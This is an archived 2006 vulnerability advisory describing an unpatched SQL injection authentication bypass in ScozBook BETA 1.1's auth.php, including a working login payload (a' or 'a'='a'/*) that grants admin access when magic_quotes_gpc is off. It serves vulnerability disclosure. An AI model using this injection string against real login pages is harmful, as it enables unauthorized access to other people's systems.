EV0011.txt

2006-01-04T00:00:00
ID PACKETSTORM:42774
Type packetstorm
Reporter Aliaksandr Hartsuyeu
Modified 2006-01-04T00:00:00

Description

                                        
                                            `New eVuln Advisory:  
ScozBook "adminname" Authentication Bypass  
  
--------------------Summary----------------  
Vendor: ScozNet  
Vendor's Web Site: http://www.scoznet.com/  
Software: ScozBook  
Sowtware's Web Site: http://sourceforge.net/projects/scozbook/  
Versions: BETA 1.1  
Critical Level: Moderate  
Type: SQL Injection  
Class: Remote  
Status: Unpatched  
Exploit: Available  
Solution: Not Available  
Discovered by: Aliaksandr Hartsuyeu (alex@evuln.com)  
Published: 2006.01.02  
eVuln ID: EV0011  
  
-----------------Description--------------  
Vulnerable scripts:  
auth.php  
  
Variable $adminname isn't properly sanitized before being used in a SQL query.  
  
Script /auth.php from main directory registers session with $adminname and $adminpass variables which used by scripts from /admin/ dirrectory.  
  
Condition: magic_quotes_gpc = off  
  
--------------Exploit---------------------  
Link:  
http://host/auth.php  
  
username: a' or 'a'='a'/*  
password: anypassword  
  
  
--------------Solution---------------------  
No Patch available.  
  
--------------Credit---------------------  
Original Advisory:  
http://evuln.com/vulns/11/summary.html  
  
Discovered by: Aliaksandr Hartsuyeu (alex@evuln.com)  
  
`